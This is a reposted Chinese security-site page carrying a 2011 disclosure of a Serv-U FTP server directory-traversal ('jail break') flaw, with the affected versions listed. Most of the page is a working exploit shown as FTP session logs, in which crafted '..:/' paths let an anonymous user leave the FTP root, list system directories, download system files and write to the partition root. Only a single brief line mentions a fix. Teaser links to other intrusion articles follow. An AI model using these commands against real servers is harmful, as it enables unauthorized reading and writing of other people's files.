Serv-U FTP Jail Break(越权遍历目录、下载任意文件)

所属分类: 网络安全 / 黑客入侵 阅读数: 141
收藏 0 赞 0 分享

本站提供程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负!

复制代码
代码如下:

[*]----------------------------------------------------[*]
Serv-U FTP Server Jail Break 0day
Discovered By Kingcope
Year 2011
[*]----------------------------------------------------[*]
/*
sebug.net
通过构造..:/来遍历服务器目录,下载任意文件
影响版本:6.4,7.1,7.3,8.2,10.5
*/
Affected:
220 Serv-U FTP Server v7.3 ready...
220 Serv-U FTP Server v7.1 ready...
220 Serv-U FTP Server v6.4 ready...
220 Serv-U FTP Server v8.2 ready...
220 Serv-U FTP Server v10.5 ready...
[*]----------------------------------------------------[*]
C:\Users\kingcope\Desktop>ftp 192.168.133.134
Verbindung mit 192.168.133.134 wurde hergestellt.
220 Serv-U FTP Server v6.4 for WinSock ready...
Benutzer (192.168.133.134:(none)): ftp (anonymous user :>)
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> cd "/..:/..:/..:/..:/program files"
250 Directory changed to /LocalUser/LocalUser/LocalUser/LocalUser/program files
ftp> ls -la
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
dr--r--r-- 1 user group 0 Nov 12 21:48 .
dr--r--r-- 1 user group 0 Nov 12 21:48 ..
drw-rw-rw- 1 user group 0 Feb 14 2011 Apache Software Foundatio
n
drw-rw-rw- 1 user group 0 Feb 5 2011 ComPlus Applications
drw-rw-rw- 1 user group 0 Jul 11 01:06 Common Files
drw-rw-rw- 1 user group 0 Jul 8 16:57 CoreFTPServer
drw-rw-rw- 1 user group 0 Jul 11 01:06 IIS Resources
d--------- 1 user group 0 Jul 8 16:12 InstallShield
Installation Information
drw-rw-rw- 1 user group 0 Jul 29 15:07 Internet Explorer
drw-rw-rw- 1 user group 0 Jul 8 16:12 Ipswitch
drw-rw-rw- 1 user group 0 Feb 12 2011 Java
drw-rw-rw- 1 user group 0 Jul 26 13:19 NetMeeting
drw-rw-rw- 1 user group 0 Jul 29 14:39 Outlook Express
drw-rw-rw- 1 user group 0 Jul 8 15:39 PostgreSQL
drw-rw-rw- 1 user group 0 Nov 12 21:48 RhinoSoft.com
drw-rw-rw- 1 user group 0 Feb 12 2011 Sun
d--------- 1 user group 0 Jul 29 15:13 Uninstall Information
drw-rw-rw- 1 user group 0 Feb 5 2011 VMware
drw-rw-rw- 1 user group 0 Jul 8 15:34 WinRAR
drw-rw-rw- 1 user group 0 Jul 26 13:30 Windows Media Player
drw-rw-rw- 1 user group 0 Feb 5 2011 Windows NT
d--------- 1 user group 0 Feb 5 2011 WindowsUpdate
226 Transfer complete.
FTP: 1795 Bytes empfangen in 0,00Sekunden 448,75KB/s
ftp>
[*]----------------------------------------------------[*]
with write perms:
ftp> put foo.txt ..:/..:/..:/foobar <<-- writes foo into root of partition
[*]----------------------------------------------------[*]
and as anonymous ftp:
ftp> get ..:/..:/..:/..:/windows/system32/calc.exe yes
200 PORT Command successful.
150 Opening ASCII mode data connection for calc.exe (115712 Bytes).
226 Transfer complete.
FTP: 115712 Bytes empfangen in 0,04Sekunden 2571,38KB/s
[*]----------------------------------------------------[*]
This works to!!! :
220 Serv-U FTP Server v7.3 ready...
Benutzer (xx.xx.xx.xx:(none)): ftp
331 User name okay, please send complete E-mail address as password.
Kennwort:
230 User logged in, proceed.
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
AUTOEXEC.BAT
boot.ini
bootfont.bin
bsmain_runtime.log
CONFIG.SYS
Documents and Settings
FPSE_search
Inetpub
IO.SYS
log
MSDOS.SYS
msizap.exe
MSOCache
mysql
NTDETECT.COM
ntldr
Program Files
RavBin
RECYCLER
Replay.log
rising.ini
System Volume Information
TDDOWNLOAD
WCH.CN
WINDOWS
wmpub
226 Transfer complete. 317 bytes transferred. 19.35 KB/sec.
FTP: 317 Bytes empfangen in 0,01Sekunden 21,13KB/s
[*]----------------------------------------------------[*]
Sometimes you need to give it the path:
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\"
ftp> ls "-a ..:\:..\..:\..:\..:\..:\..:\..:\..:\program files\*"
200 PORT Command successful.
150 Opening ASCII mode data connection for /bin/ls.
.
..
360
Adobe
ASP.NET
CCProxy
CE Remote Tools
cmak
Common Files
ComPlus Applications
D-Tools
FFTPServer
HTML Help Workshop
IISServer
InstallShield Installation Information
Intel
Internet Explorer
Java
JavaSoft
K-Lite Codec Pack
Microsoft ActiveSync
Microsoft Analysis Services
Microsoft Device Emulator
Microsoft MapPoint Web Service Samples
Microsoft MapPoint Web Service SDK, Version 4.0
Microsoft Office
Microsoft Office Servers
Microsoft Silverlight
Microsoft SQL Server
Microsoft Visual SourceSafe
Microsoft Visual Studio 8
Microsoft.NET
MSBuild
MSXML 6.0
NetMeeting
Outlook Express
PortMap1.61
Reference Assemblies
Rising
SQLXML 4.0
SQLyog Enterprise
STS2Setup_2052
Symantec
Thunder Network
TSingVision
Uninstall Information
Windows Media Player
Windows NT
WindowsUpdate
WinRAR
226 Transfer complete. 835 bytes transferred. 50.96 KB/sec.
FTP: 835 Bytes empfangen in 0,01Sekunden 64,23KB/s
ftp>

@Sebug.net [ 2011-12-01 ]
脚本提供修正方法:通过设置serv_u的权限可以防范此类问题,大家一定要注意serv_u安全设置问题。

更多精彩内容其他人还在看

黑客谈MS07-029域名DNS漏洞利用入侵过程

前言: MS07-029,Windows 域名系统 (DNS) 服务器服务的远程过程调用 (RPC) 管理接口中存在基于堆栈的缓冲区溢出。漏洞的前提是没打补丁,开启DNS服务的所有版本WINDOWS 2000 Server和WINDOWS 2003 Server。 今天
收藏 0 赞 0 分享

黑客教你SQL注入Access导出WebShell的方法

热 点: 已经听N个人过说有人已经发现SQL注入Access得到webshell的技术了,也只是听说而已,具体的细节还是不得而知。 最近在看的书中一章提到Jet的安全,然后灵光一闪,呵呵,发现了一种可以利用access导出asp的方法,分享之。
收藏 0 赞 0 分享

一个注射点,一个webshell甚至系统权限

————只要给我一个注射点,无论什么权限,我都给你一个webshell甚至系统权限 声明:本文仅用于教学目的,如果因为本文造成的攻击后果本人概不负责。因为 发觉其危害过大,原文已经经过大量删减及修改,即使这样本文的危害性
收藏 0 赞 0 分享

黑客实战:一次简单脚本攻击实例

一、开篇 今天闲着无聊,到本地区的一个社区上转转,那些人污言秽语的,有个帖子还侵犯了一个朋友的版权,跟贴说了那人几句,管理员也不管,实在看不下去了,打算给管理员盆冷水清醒清醒。 二、准备/分析 安全第一,先开个HTTP代理,打开社区的登陆页面,
收藏 0 赞 0 分享

eWebEditor编辑器成网站中的隐形炸弹

站长在使用eWebEditor的时候是否发现,eWebEditor配置不当会使其成为网站中的隐形炸弹呢?第一次发现这漏洞源于去年的一次入侵,在山穷水尽的时候发现了eWebEditor,于是很简单就获得了WebShell。后来又有好几次利用eWebEditor进行入侵的成功经历,这
收藏 0 赞 0 分享

系统泄露密码的入侵攻击分析

WINDOWS访问139端口时自动用当前用户、密码连接,造成泄露用户密码,虽然其密码是加密的,但一样可以用来攻击。   下面是SMB的密码认证方式。   WINDOWS的139口的访问过程,箭头表示数据方向:   1.客户端<---------------
收藏 0 赞 0 分享

看看黑客是怎样使用Google黑掉Windows服务器

在我的《为什么使用Google扫描安全漏洞》的技巧中,我讨论了如何使用Google.com来执行对你的面向公众的服务器的安全扫描――包括Windows、IIS、Apache和(但愿不会如此!)SQL Server。你能使用它得到服务器的信息、包含敏感信息的文件和检测出&ldquo
收藏 0 赞 0 分享

黑客总结的实用的网站渗透步骤

本文是黑客们总结的比较实用的网站渗透的一些步骤
收藏 0 赞 0 分享

一句话木马加密 过护卫神云查杀系统 过shell扫描器

这个一句话木马最近被利用的很多,很多扫描工具扫描不到,不过一些asp版的扫描工具支持扫描eval和execute,如果发现如下代码,请删除,下面就是他们常发的木马后门
收藏 0 赞 0 分享

安全狗下添加用户的另一方法(大量操作实现突破)

这篇文章主要是针对安装服务器安全狗的机器,突破添加用户的操作,用for循环实现,但如果服务器安装了360就无法使用
收藏 0 赞 0 分享
查看更多